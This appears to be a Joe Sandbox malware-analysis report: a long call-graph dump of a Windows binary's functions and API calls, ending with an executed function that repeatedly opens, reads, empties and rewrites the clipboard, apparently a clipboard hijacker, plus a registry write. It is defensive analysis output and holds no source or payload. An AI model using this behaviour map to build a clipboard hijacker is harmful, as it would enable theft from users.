131541 410c43 131532->131541 131536 4057e3 131561 40d1e9 131536->131561 131538 405843 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131538->131508 131539 405812 std::ios_base::_Ios_base_dtor 131539->131538 131540 40d678 166 API calls 131539->131540 131540->131538 131543 410c48 131541->131543 131544 4057d6 131543->131544 131546 410c64 Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 131543->131546 131577 42bf8a 131543->131577 131584 430660 7 API calls 2 library calls 131543->131584 131549 40eb98 131544->131549 131585 42974d RaiseException 131546->131585 131548 41150c 131550 40eba4 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131549->131550 131588 40efaa 131550->131588 131553 40ebe0 131594 40f002 131553->131594 131556 40ebc2 131602 40ed27 166 API calls _Atexit 131556->131602 131557 40ec20 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131557->131536 131559 40ebca 131603 40eaf0 21 API calls 2 library calls 131559->131603 131562 40d1f5 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131561->131562 131563 40efaa std::_Lockit::_Lockit 2 API calls 131562->131563 131564 40d1ff 131563->131564 131608 40cdbc 131564->131608 131566 40d216 std::locale::_Getfacet 131574 40d229 131566->131574 131614 40d114 166 API calls 4 library calls 131566->131614 131567 40f002 std::_Lockit::~_Lockit 2 API calls 131569 40d266 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131567->131569 131569->131539 131570 40d239 131571 40d240 131570->131571 131572 40d26e 131570->131572 131615 40eb66 22 API calls Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 131571->131615 131616 42974d RaiseException 131572->131616 131574->131567 131576 40d284 131582 434b8b __Thrd_start 131577->131582 131578 434bc9 131587 42fcd5 20 API calls __dosmaperr 131578->131587 131579 434bb4 RtlAllocateHeap 131581 434bc7 131579->131581 131579->131582 131581->131543 131582->131578 131582->131579 131586 430660 7 API calls 2 library calls 131582->131586 131584->131543 131585->131548 131586->131582 131587->131581 131589 40efc0 131588->131589 131590 40efb9 131588->131590 131593 40ebaf 131589->131593 131605 410361 EnterCriticalSection 131589->131605 131604 42f658 EnterCriticalSection std::_Lockit::_Lockit 131590->131604 131593->131553 131601 40ed04 22 API calls 2 library calls 131593->131601 131595 42f661 131594->131595 131596 40f00c 131594->131596 131607 42f641 LeaveCriticalSection 131595->131607 131598 40f01f 131596->131598 131606 41036f LeaveCriticalSection 131596->131606 131598->131557 131599 42f668 131599->131557 131601->131556 131602->131559 131603->131553 131604->131593 131605->131593 131606->131598 131607->131599 131609 40cdc8 131608->131609 131610 40cdec 131608->131610 131611 40efaa std::_Lockit::_Lockit 2 API calls 131609->131611 131610->131566 131612 40cdd2 131611->131612 131613 40f002 std::_Lockit::~_Lockit 2 API calls 131612->131613 131613->131610 131614->131570 131615->131574 131616->131576 131617->131517 131618->131527 131619->131523 131620->131525 131622 405045 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131621->131622 131633 40568e 131622->131633 131624 40506d Concurrency::details::_CancellationTokenState::_DeregisterCallback 131624->131479 131626 403b0e 131625->131626 131632 403b69 131626->131632 131640 405284 131626->131640 131629 403b56 131629->131632 131649 42d4ec 131629->131649 131632->131480 131634 40569a Concurrency::details::_CancellationTokenState::_DeregisterCallback 131633->131634 131636 4056b7 131634->131636 131639 4055bd 166 API calls Concurrency::details::_CancellationTokenState::_DeregisterCallback 131634->131639 131635 40d678 166 API calls 131638 4056c3 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131635->131638 131636->131635 131636->131638 131638->131624 131639->131636 131643 40529e 131640->131643 131644 4052d2 131640->131644 131641 410a06 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 131642 403b39 131641->131642 131642->131629 131642->131632 131646 42d4b6 131642->131646 131643->131644 131660 42d77f 166 API calls 2 library calls 131643->131660 131644->131641 131661 42d27d 131646->131661 131648 42d4cc 131648->131629 131650 42d4f7 131649->131650 131651 42d50c 131649->131651 131701 42fcd5 20 API calls __dosmaperr 131650->131701 131652 42d524 131651->131652 131703 42fcd5 20 API calls __dosmaperr 131651->131703 131652->131632 131654 42d4fc 131702 42b6dd 26 API calls _Deallocate 131654->131702 131657 42d519 131704 42b6dd 26 API calls _Deallocate 131657->131704 131658 42d507 131658->131632 131660->131644 131662 42d289 ___DestructExceptionObject 131661->131662 131663 42d295 131662->131663 131665 42d2bb 131662->131665 131686 42fcd5 20 API calls __dosmaperr 131663->131686 131674 42dd0b EnterCriticalSection 131665->131674 131667 42d29a 131687 42b6dd 26 API calls _Deallocate 131667->131687 131668 42d2c7 131675 42d3dd 131668->131675 131671 42d2db 131688 42d2fa LeaveCriticalSection std::_Xfsopen 131671->131688 131673 42d2a5 __fread_nolock 131673->131648 131674->131668 131676 42d3ff 131675->131676 131677 42d3ef 131675->131677 131689 42d304 131676->131689 131699 42fcd5 20 API calls __dosmaperr 131677->131699 131680 42d3f4 131680->131671 131681 42d422 _Xfiopen 131685 42d4a1 131681->131685 131693 42ce1e 131681->131693 131684 435cd2 __wsopen_s 28 API calls 131684->131685 131685->131671 131686->131667 131687->131673 131688->131673 131690 42d317 131689->131690 131692 42d310 _Xfiopen 131689->131692 131691 435cd2 __wsopen_s 28 API calls 131690->131691 131690->131692 131691->131692 131692->131681 131694 42ce36 131693->131694 131695 42ce32 131693->131695 131694->131695 131696 433dec __fread_nolock 26 API calls 131694->131696 131695->131684 131697 42ce56 131696->131697 131700 4352f7 166 API calls 6 library calls 131697->131700 131699->131680 131700->131695 131701->131654 131702->131658 131703->131657 131704->131652 131706 4050fc 131705->131706 131711 4050f8 131705->131711 131707 405104 131706->131707 131708 40511f 131706->131708 131713 40dba7 131707->131713 131720 4055b2 28 API calls std::system_error::system_error 131708->131720 131711->131484 131714 40dbb4 131713->131714 131715 40dbbd 131713->131715 131721 40db79 131714->131721 131716 40dbc9 131715->131716 131718 410c43 Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 131715->131718 131716->131711 131719 40dbba 131718->131719 131719->131711 131722 410c43 Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 131721->131722 131723 40db90 131722->131723 131724 40dba2 131723->131724 131725 40db97 131723->131725 131730 42b662 26 API calls 3 library calls 131724->131730 131725->131719 131727 42b6fc 131731 42b70a 11 API calls _Atexit 131727->131731 131729 42b709 131730->131727 131731->131729 131732->131492 131734 403cb4 131733->131734 131735 403cc7 ctype 131733->131735 131734->131500 131735->131734 131738 42bd63 131735->131738 131737->131501 131741 42bd80 131738->131741 131740 42bd7b 131740->131734 131742 42bd8c ___DestructExceptionObject 131741->131742 131743 42bd9f Concurrency::details::ResourceManager::DetermineTopology 131742->131743 131744 42bdcc 131742->131744 131746 42bdc4 __fread_nolock 131742->131746 131768 42fcd5 20 API calls __dosmaperr 131743->131768 131754 42dd0b EnterCriticalSection 131744->131754 131746->131740 131747 42bdd6 131755 42bb97 131747->131755 131750 42bdb9 131769 42b6dd 26 API calls _Deallocate 131750->131769 131754->131747 131759 42bba9 Concurrency::details::ResourceManager::DetermineTopology 131755->131759 131761 42bbc6 131755->131761 131756 42bbb6 131771 42fcd5 20 API calls __dosmaperr 131756->131771 131758 42bbbb 131772 42b6dd 26 API calls _Deallocate 131758->131772 131759->131756 131759->131761 131763 42bc09 __fread_nolock 131759->131763 131770 42be0b LeaveCriticalSection std::_Xfsopen 131761->131770 131762 42bd25 Concurrency::details::ResourceManager::DetermineTopology 131774 42fcd5 20 API calls __dosmaperr 131762->131774 131763->131761 131763->131762 131765 433dec __fread_nolock 26 API calls 131763->131765 131767 43440d __fread_nolock 38 API calls 131763->131767 131773 42be13 26 API calls 4 library calls 131763->131773 131765->131763 131767->131763 131768->131750 131769->131746 131770->131746 131771->131758 131772->131761 131773->131763 131774->131758 131775->131429 131776 40edb4 131777 40edd0 _Xfiopen 131776->131777 131779 40ee16 131777->131779 131781 40ee1c 131777->131781 131782 42d4d1 131777->131782 131779->131781 131785 42bf0a 166 API calls 5 library calls 131779->131785 131783 42d27d _Xfiopen 166 API calls 131782->131783 131784 42d4e7 131783->131784 131784->131779 131785->131781 131786 433bd9 131791 433763 131786->131791 131789 433c01 131796 43378e 131791->131796 131793 433981 131810 42b6dd 26 API calls _Deallocate 131793->131810 131795 4338e0 131795->131789 131803 43e5c8 131795->131803 131799 4338d7 131796->131799 131806 43ddae 169 API calls 2 library calls 131796->131806 131798 433921 131798->131799 131807 43ddae 169 API calls 2 library calls 131798->131807 131799->131795 131809 42fcd5 20 API calls __dosmaperr 131799->131809 131801 433940 131801->131799 131808 43ddae 169 API calls 2 library calls 131801->131808 131811 43ded1 131803->131811 131805 43e5e3 131805->131789 131806->131798 131807->131801 131808->131799 131809->131793 131810->131795 131814 43dedd ___DestructExceptionObject 131811->131814 131812 43deeb 131829 42fcd5 20 API calls __dosmaperr 131812->131829 131814->131812 131816 43df24 131814->131816 131815 43def0 131830 42b6dd 26 API calls _Deallocate 131815->131830 131822 43e577 131816->131822 131821 43defa __fread_nolock 131821->131805 131832 440f01 131822->131832 131827 43494e _free 20 API calls 131828 43df48 131827->131828 131831 43df71 LeaveCriticalSection __wsopen_s 131828->131831 131829->131815 131830->131821 131831->131821 131833 440f24 131832->131833 131834 440f0d 131832->131834 131836 440f43 131833->131836 131837 440f2c 131833->131837 131903 42fcd5 20 API calls __dosmaperr 131834->131903 131907 43648e 10 API calls 2 library calls 131836->131907 131905 42fcd5 20 API calls __dosmaperr 131837->131905 131839 440f12 131904 42b6dd 26 API calls _Deallocate 131839->131904 131841 440f4a MultiByteToWideChar 131844 440f79 131841->131844 131845 440f69 GetLastError 131841->131845 131843 440f31 131906 42b6dd 26 API calls _Deallocate 131843->131906 131909 434b8b 21 API calls 3 library calls 131844->131909 131908 42fc9f 20 API calls 2 library calls 131845->131908 131849 43e58d 131849->131828 131856 43e5e8 131849->131856 131850 440f81 131851 440fa9 131850->131851 131852 440f88 MultiByteToWideChar 131850->131852 131853 43494e _free 20 API calls 131851->131853 131852->131851 131854 440f9d GetLastError 131852->131854 131853->131849 131910 42fc9f 20 API calls 2 library calls 131854->131910 131911 43e34b 131856->131911 131859 43e633 131929 43ac5e 131859->131929 131860 43e61a 131943 42fcc2 20 API calls __dosmaperr 131860->131943 131863 43e638 131864 43e641 131863->131864 131865 43e658 131863->131865 131945 42fcc2 20 API calls __dosmaperr 131864->131945 131942 43e2b6 CreateFileW 131865->131942 131869 43e646 131946 42fcd5 20 API calls __dosmaperr 131869->131946 131871 43e70e GetFileType 131872 43e719 GetLastError 131871->131872 131877 43e760 131871->131877 131949 42fc9f 20 API calls 2 library calls 131872->131949 131873 43e6e3 GetLastError 131948 42fc9f 20 API calls 2 library calls 131873->131948 131874 43e691 131874->131871 131874->131873 131947 43e2b6 CreateFileW 131874->131947 131951 43aba7 21 API calls 3 library calls 131877->131951 131878 43e61f 131944 42fcd5 20 API calls __dosmaperr 131878->131944 131879 43e727 CloseHandle 131879->131878 131881 43e750 131879->131881 131950 42fcd5 20 API calls __dosmaperr 131881->131950 131883 43e6d6 131883->131871 131883->131873 131884 43e781 131886 43e7cd 131884->131886 131952 43e4c7 168 API calls 4 library calls 131884->131952 131891 43e7fa 131886->131891 131953 43e069 166 API calls 4 library calls 131886->131953 131887 43e755 131887->131878 131890 43e7f3 131890->131891 131892 43e80b 131890->131892 131954 434ab1 29 API calls 2 library calls 131891->131954 131894 43e5b5 131892->131894 131895 43e889 CloseHandle 131892->131895 131894->131827 131955 43e2b6 CreateFileW 131895->131955 131897 43e8b4 131898 43e803 131897->131898 131899 43e8be GetLastError 131897->131899 131898->131894 131956 42fc9f 20 API calls 2 library calls 131899->131956 131901 43e8ca 131957 43ad70 21 API calls 3 library calls 131901->131957 131903->131839 131904->131849 131905->131843 131906->131849 131907->131841 131908->131849 131909->131850 131910->131851 131912 43e36c 131911->131912 131917 43e386 131911->131917 131912->131917 131965 42fcd5 20 API calls __dosmaperr 131912->131965 131915 43e37b 131966 42b6dd 26 API calls _Deallocate 131915->131966 131958 43e2db 131917->131958 131918 43e3ed 131926 43e440 131918->131926 131969 4311ef 26 API calls 2 library calls 131918->131969 131919 43e3be 131919->131918 131967 42fcd5 20 API calls __dosmaperr 131919->131967 131922 43e43b 131924 43e4ba 131922->131924 131922->131926 131923 43e3e2 131968 42b6dd 26 API calls _Deallocate 131923->131968 131970 42b70a 11 API calls _Atexit 131924->131970 131926->131859 131926->131860 131928 43e4c6 131930 43ac6a ___DestructExceptionObject 131929->131930 131973 42f5f9 EnterCriticalSection 131930->131973 131932 43acb8 131974 43ad67 131932->131974 131934 43ac96 131977 43aa3d 21 API calls 3 library calls 131934->131977 131935 43ace1 __fread_nolock 131935->131863 131937 43ac71 131937->131932 131937->131934 131939 43ad04 EnterCriticalSection 131937->131939 131938 43ac9b 131938->131932 131978 43ab84 EnterCriticalSection 131938->131978 131939->131932 131941 43ad11 LeaveCriticalSection 131939->131941 131941->131937 131942->131874 131943->131878 131944->131894 131945->131869 131946->131878 131947->131883 131948->131878 131949->131879 131950->131887 131951->131884 131952->131886 131953->131890 131954->131898 131955->131897 131956->131901 131957->131898 131960 43e2f3 131958->131960 131959 43e30e 131959->131919 131960->131959 131971 42fcd5 20 API calls __dosmaperr 131960->131971 131962 43e332 131972 42b6dd 26 API calls _Deallocate 131962->131972 131964 43e33d 131964->131919 131965->131915 131966->131917 131967->131923 131968->131918 131969->131922 131970->131928 131971->131962 131972->131964 131973->131937 131979 42f641 LeaveCriticalSection 131974->131979 131976 43ad6e 131976->131935 131977->131938 131978->131932 131979->131976 131980 405a5b 131981 405a67 Concurrency::details::_CancellationTokenState::_DeregisterCallback 131980->131981 131982 410c43 Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 22 API calls 131981->131982 131983 405a70 131982->131983 131986 406220 131983->131986 131985 405a87 Concurrency::details::_CancellationTokenState::_DeregisterCallback Concurrency::details::SchedulerProxy::Cleanup 131987 40622c Concurrency::details::_CancellationTokenState::_DeregisterCallback __Cnd_init 131986->131987 131989 406244 __Mtx_init 131987->131989 132010 40dea3 28 API calls std::_Throw_Cpp_error 131987->132010 131990 40626b 131989->131990 132011 40dea3 28 API calls std::_Throw_Cpp_error 131989->132011 132002 4010ea 131990->132002 131996 4062ba 131998 4062cf Concurrency::details::SchedulerProxy::Cleanup 131996->131998 132013 401128 30 API calls 2 library calls 131996->132013 132014 401109 131998->132014 132001 4062f4 Concurrency::details::_CancellationTokenState::_DeregisterCallback 132001->131985 132018 40e384 132002->132018 132005 401103 132007 40df64 132005->132007 132042 42f320 132007->132042 132010->131989 132011->131990 132012 40dea3 28 API calls std::_Throw_Cpp_error 132012->131996 132013->131996 132015 401115 __Mtx_unlock 132014->132015 132016 401122 132015->132016 132241 40dea3 28 API calls std::_Throw_Cpp_error 132015->132241 132016->132001 132022 40e0de 132018->132022 132021 40dea3 28 API calls std::_Throw_Cpp_error 132021->132005 132023 40e134 132022->132023 132024 40e106 GetCurrentThreadId 132022->132024 132025 40e138 GetCurrentThreadId 132023->132025 132026 40e15e 132023->132026 132027 40e111 GetCurrentThreadId 132024->132027 132036 40e12c 132024->132036 132029 40e147 132025->132029 132028 40e1f7 GetCurrentThreadId 132026->132028 132032 40e17e 132026->132032 132027->132036 132028->132029 132030 40e24e GetCurrentThreadId 132029->132030 132029->132036 132030->132036 132031 410a06 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 132033 4010f6 132031->132033 132040 40fa66 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 132032->132040 132033->132005 132033->132021 132036->132031 132037 40e1b6 GetCurrentThreadId 132037->132029 132038 40e189 __Xtime_diff_to_millis2 132037->132038 132038->132029 132038->132036 132038->132037 132041 40fa66 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 132038->132041 132040->132038 132041->132038 132043 42f341 132042->132043 132044 42f32d 132042->132044 132056 42f2d7 132043->132056 132065 42fcd5 20 API calls __dosmaperr 132044->132065 132047 42f332 132066 42b6dd 26 API calls _Deallocate 132047->132066 132050 42f356 CreateThread 132051 42f375 GetLastError 132050->132051 132055 42f381 132050->132055 132087 42f1cc 132050->132087 132067 42fc9f 20 API calls 2 library calls 132051->132067 132053 4062a7 132053->131996 132053->132012 132068 42f249 132055->132068 132076 43620e 132056->132076 132059 43494e _free 20 API calls 132060 42f2f0 132059->132060 132061 42f2f7 GetModuleHandleExW 132060->132061 132062 42f30f 132060->132062 132061->132062 132063 42f249 __Thrd_start 22 API calls 132062->132063 132064 42f319 132063->132064 132064->132050 132064->132055 132065->132047 132066->132053 132067->132055 132069 42f256 132068->132069 132070 42f27a 132068->132070 132071 42f265 132069->132071 132072 42f25c CloseHandle 132069->132072 132070->132053 132073 42f274 132071->132073 132074 42f26b FreeLibrary 132071->132074 132072->132071 132075 43494e _free 20 API calls 132073->132075 132074->132073 132075->132070 132077 43621b 132076->132077 132078 43625b 132077->132078 132079 436246 HeapAlloc 132077->132079 132080 43622f __Thrd_start 132077->132080 132086 42fcd5 20 API calls __dosmaperr 132078->132086 132079->132080 132081 436259 132079->132081 132080->132078 132080->132079 132085 430660 7 API calls 2 library calls 132080->132085 132083 42f2e7 132081->132083 132083->132059 132085->132080 132086->132083 132088 42f1d8 _Atexit 132087->132088 132089 42f1df GetLastError ExitThread 132088->132089 132090 42f1ec 132088->132090 132103 4330ea GetLastError 132090->132103 132092 42f1f1 132123 436a55 132092->132123 132095 42f207 132130 401169 132095->132130 132104 433100 132103->132104 132105 433106 132103->132105 132138 4365f5 11 API calls 2 library calls 132104->132138 132107 43620e __Thrd_start 20 API calls 132105->132107 132108 433155 SetLastError 132105->132108 132109 433118 132107->132109 132108->132092 132110 433120 132109->132110 132139 43664b 11 API calls 2 library calls 132109->132139 132112 43494e _free 20 API calls 132110->132112 132115 433126 132112->132115 132113 433135 132113->132110 132114 43313c 132113->132114 132140 432f5c 20 API calls __ExceptionPtr::__ExceptionPtr 132114->132140 132117 433161 SetLastError 132115->132117 132141 42f189 166 API calls 2 library calls 132117->132141 132118 433147 132120 43494e _free 20 API calls 132118->132120 132122 43314e 132120->132122 132121 43316d 132122->132108 132122->132117 132124 436a70 132123->132124 132125 436a7a 132123->132125 132127 410a06 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 132124->132127 132142 436377 5 API calls 2 library calls 132125->132142 132128 42f1fc 132127->132128 132128->132095 132137 436988 10 API calls 2 library calls 132128->132137 132129 436a91 132129->132124 132143 406850 132130->132143 132156 40155a Sleep 132130->132156 132131 401173 132134 42f3a5 132131->132134 132209 42f280 132134->132209 132136 42f3b2 132137->132095 132138->132105 132139->132113 132140->132118 132141->132121 132142->132129 132144 40685c Concurrency::details::_CancellationTokenState::_DeregisterCallback 132143->132144 132145 4010ea std::_Cnd_initX 35 API calls 132144->132145 132146 406871 __Cnd_signal 132145->132146 132147 406889 132146->132147 132186 40dea3 28 API calls std::_Throw_Cpp_error 132146->132186 132149 401109 std::_Cnd_initX 28 API calls 132147->132149 132150 406892 132149->132150 132155 402add 166 API calls 132150->132155 132158 4016e3 132150->132158 132151 406894 132179 40f8a2 132151->132179 132153 406899 Concurrency::details::_CancellationTokenState::_DeregisterCallback Concurrency::details::SchedulerProxy::Cleanup 132153->132131 132155->132151 132157 4016d9 132156->132157 132187 410f1d 132158->132187 132160 4016ef Sleep 132188 40dc81 132160->132188 132163 40dc81 28 API calls 132164 401715 132163->132164 132165 40171f OpenClipboard 132164->132165 132166 401947 Sleep 132165->132166 132167 40172f GetClipboardData 132165->132167 132166->132165 132168 401941 CloseClipboard 132167->132168 132169 40173f GlobalLock 132167->132169 132168->132166 132169->132168 132175 40174c _strlen 132169->132175 132170 40dc81 28 API calls 132170->132175 132172 4018d6 EmptyClipboard GlobalAlloc 132173 4018ef GlobalLock 132172->132173 132172->132175 132193 427ad0 132173->132193 132175->132168 132175->132170 132175->132172 132177 40dc38 28 API calls std::system_error::system_error 132175->132177 132192 403317 166 API calls 2 library calls 132175->132192 132194 40db17 26 API calls _Deallocate 132175->132194 132177->132175 132178 401909 GlobalUnlock SetClipboardData GlobalFree 132178->132175 132200 40f021 132179->132200 132184 40f8b9 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 132207 40f02d LeaveCriticalSection std::_Lockit::~_Lockit 132184->132207 132185 40f947 132185->132153 132186->132147 132187->132160 132189 40dc9d _strlen 132188->132189 132195 40dc38 132189->132195 132191 401708 132191->132163 132192->132175 132193->132178 132194->132175 132196 40dc47 BuildCatchObjectHelperInternal 132195->132196 132197 40dc6b 132195->132197 132196->132191 132197->132196 132199 40dbcd 28 API calls 4 library calls 132197->132199 132199->132196 132208 410361 EnterCriticalSection 132200->132208 132202 40f02b 132203 40df0a GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 132202->132203 132204 40df43 132203->132204 132205 40df38 CloseHandle 132203->132205 132206 40df47 GetCurrentThreadId 132204->132206 132205->132206 132206->132184 132207->132185 132208->132202 132218 43316e GetLastError 132209->132218 132212 42f28f ExitThread 132213 42f2ad 132215 42f2c0 132213->132215 132216 42f2b9 CloseHandle 132213->132216 132215->132212 132217 42f2cc FreeLibraryAndExitThread 132215->132217 132216->132215 132219 43318d 132218->132219 132220 433187 132218->132220 132221 43620e __Thrd_start 17 API calls 132219->132221 132224 4331e4 SetLastError 132219->132224 132238 4365f5 11 API calls 2 library calls 132220->132238 132223 43319f 132221->132223 132225 4331a7 132223->132225 132239 43664b 11 API calls 2 library calls 132223->132239 132226 42f28b 132224->132226 132228 43494e _free 17 API calls 132225->132228 132226->132212 132226->132213 132237 4369da 10 API calls 2 library calls 132226->132237 132230 4331ad 132228->132230 132229 4331bc 132229->132225 132231 4331c3 132229->132231 132232 4331db SetLastError 132230->132232 132240 432f5c 20 API calls __ExceptionPtr::__ExceptionPtr 132231->132240 132232->132226 132234 4331ce 132235 43494e _free 17 API calls 132234->132235 132236 4331d4 132235->132236 132236->132224 132236->132232 132237->132213 132238->132219 132239->132229 132240->132234 132241->132016 132242 40320b RegCreateKeyExW 132243 403239 RegSetValueExW 132242->132243 132244 40324d 132242->132244 132243->132244 132245 403252 RegCloseKey 132244->132245 132246 40325b 132244->132246 132245->132246 132247 410d3d 132248 410d49 ___DestructExceptionObject 132247->132248 132276 41112a 132248->132276 132250 410d50 132251 410ea3 132250->132251 132255 410d7a 132250->132255 132297 411613 4 API calls 2 library calls 132251->132297 132253 410eaa 132298 4311d9 28 API calls _Atexit 132253->132298 132265 410db9 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 132255->132265 132291 430efe 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 132255->132291 132256 410eb0 132299 43118b 28 API calls _Atexit 132256->132299 132259 410eb8 132260 410d99 132261 410d93 132261->132260 132292 430ea2 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 132261->132292 132263 410e1a 132287 41172d 132263->132287 132265->132263 132293 42b4a6 166 API calls 4 library calls 132265->132293 132267 410e20 132268 410e35 132267->132268 132294 411763 GetModuleHandleW 132268->132294 132270 410e3c 132270->132253 132271 410e40 132270->132271 132272 410e49 132271->132272 132295 43117c 28 API calls _Atexit 132271->132295 132296 4112b9 13 API calls 2 library calls 132272->132296 132275 410e51 132275->132260 132277 411133 132276->132277 132300 4118bb IsProcessorFeaturePresent 132277->132300 132279 41113f 132301 429967 10 API calls 3 library calls 132279->132301 132281 411144 132286 411148 132281->132286 132302 4329b1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 132281->132302 132283 411151 132284 41115f 132283->132284 132303 429990 8 API calls 3 library calls 132283->132303 132284->132250 132286->132250 132304 427970 132287->132304 132290 411753 132290->132267 132291->132261 132292->132265 132293->132263 132294->132270 132295->132272 132296->132275 132297->132253 132298->132256 132299->132259 132300->132279 132301->132281 132302->132283 132303->132286 132305 411740 GetStartupInfoW 132304->132305 132305->132290 132306 4355ee 132307 4355fa ___DestructExceptionObject 132306->132307 132308 435606 132307->132308 132309 43561d 132307->132309 132340 42fcd5 20 API calls __dosmaperr 132308->132340 132319 42dd0b EnterCriticalSection 132309->132319 132312 43562d 132320 43566a 132312->132320 132313 43560b 132341 42b6dd 26 API calls _Deallocate 132313->132341 132316 435639 132342 435660 LeaveCriticalSection std::_Xfsopen 132316->132342 132317 435616 __fread_nolock 132319->132312 132321 435692 132320->132321 132322 435678 132320->132322 132324 433dec __fread_nolock 26 API calls 132321->132324 132346 42fcd5 20 API calls __dosmaperr 132322->132346 132326 43569b 132324->132326 132325 43567d 132347 42b6dd 26 API calls _Deallocate 132325->132347 132343 435cb7 132326->132343 132330 435688 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 132330->132316 132331 435723 132335 435740 132331->132335 132337 435752 132331->132337 132332 43579f 132333 4357ac 132332->132333 132332->132337 132349 42fcd5 20 API calls __dosmaperr 132333->132349 132348 435983 31 API calls 4 library calls 132335->132348 132337->132330 132350 4357ff 30 API calls 2 library calls 132337->132350 132338 43574a 132338->132330 132340->132313 132341->132317 132342->132317 132351 435b34 132343->132351 132345 4356b7 132345->132330 132345->132331 132345->132332 132346->132325 132347->132330 132348->132338 132349->132330 132350->132330 132352 435b40 ___DestructExceptionObject 132351->132352 132353 435b60 132352->132353 132354 435b48 132352->132354 132356 435c14 132353->132356 132361 435b98 132353->132361 132377 42fcc2 20 API calls __dosmaperr 132354->132377 132382 42fcc2 20 API calls __dosmaperr 132356->132382 132357 435b4d 132378 42fcd5 20 API calls __dosmaperr 132357->132378 132360 435c19 132383 42fcd5 20 API calls __dosmaperr 132360->132383 132376 43ab84 EnterCriticalSection 132361->132376 132364 435c21 132384 42b6dd 26 API calls _Deallocate 132364->132384 132365 435b9e 132367 435bc2 132365->132367 132368 435bd7 132365->132368 132379 42fcd5 20 API calls __dosmaperr 132367->132379 132370 435c39 __wsopen_s 28 API calls 132368->132370 132373 435bd2 132370->132373 132371 435bc7 132380 42fcc2 20 API calls __dosmaperr 132371->132380 132372 435b55 __fread_nolock 132372->132345 132381 435c0c LeaveCriticalSection __wsopen_s 132373->132381 132376->132365 132377->132357 132378->132372 132379->132371 132380->132373 132381->132372 132382->132360 132383->132364 132384->132372 132385 42b9ff 132388 42ba0b ___DestructExceptionObject 132385->132388 132386 42ba19 132410 42fcd5 20 API calls __dosmaperr 132386->132410 132388->132386 132390 42ba46 132388->132390 132389 42ba1e 132411 42b6dd 26 API calls _Deallocate 132389->132411 132392 42ba4b 132390->132392 132393 42ba58 132390->132393 132412 42fcd5 20 API calls __dosmaperr 132392->132412 132402 433606 132393->132402 132396 42ba29 __fread_nolock 132397 42ba61 132398 42ba75 132397->132398 132399 42ba68 132397->132399 132414 42baa9 LeaveCriticalSection std::_Xfsopen _Xfiopen 132398->132414 132413 42fcd5 20 API calls __dosmaperr 132399->132413 132403 433612 ___DestructExceptionObject 132402->132403 132415 42f5f9 EnterCriticalSection 132403->132415 132405 433620 132416 4336a0 132405->132416 132409 433651 __fread_nolock 132409->132397 132410->132389 132411->132396 132412->132396 132413->132396 132414->132396 132415->132405 132417 4336c3 132416->132417 132418 43371c 132417->132418 132425 43362d 132417->132425 132432 42dd0b EnterCriticalSection 132417->132432 132433 42dd1f LeaveCriticalSection 132417->132433 132419 43620e __Thrd_start 20 API calls 132418->132419 132420 433725 132419->132420 132422 43494e _free 20 API calls 132420->132422 132423 43372e 132422->132423 132423->132425 132434 436775 11 API calls 2 library calls 132423->132434 132429 43365c 132425->132429 132426 43374d 132435 42dd0b EnterCriticalSection 132426->132435 132436 42f641 LeaveCriticalSection 132429->132436 132431 433663 132431->132409 132432->132417 132433->132417 132434->132426 132435->132425 132436->132431

                                                                                                                                    Executed Functions

                                                                                                                                    Function 004016E3 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 004016EA
                                                                                                                                    • Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
                                                                                                                                      • Part of subcall function 0040DC81: _strlen.LIBCMT ref: 0040DC98
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00401721
                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 00401731
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00401740
                                                                                                                                    • _strlen.LIBCMT ref: 0040174D
                                                                                                                                    • _strlen.LIBCMT ref: 0040177C
                                                                                                                                    • _strlen.LIBCMT ref: 004018C0
                                                                                                                                    • EmptyClipboard.USER32 ref: 004018D6
                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00401901
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040190D
                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00401916
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040191D
                                                                                                                                    • CloseClipboard.USER32 ref: 00401941
                                                                                                                                    • Sleep.KERNEL32(000002C7), ref: 0040194C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3346283714.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_Blank.jbxd
                                                                                                                                    Similarity
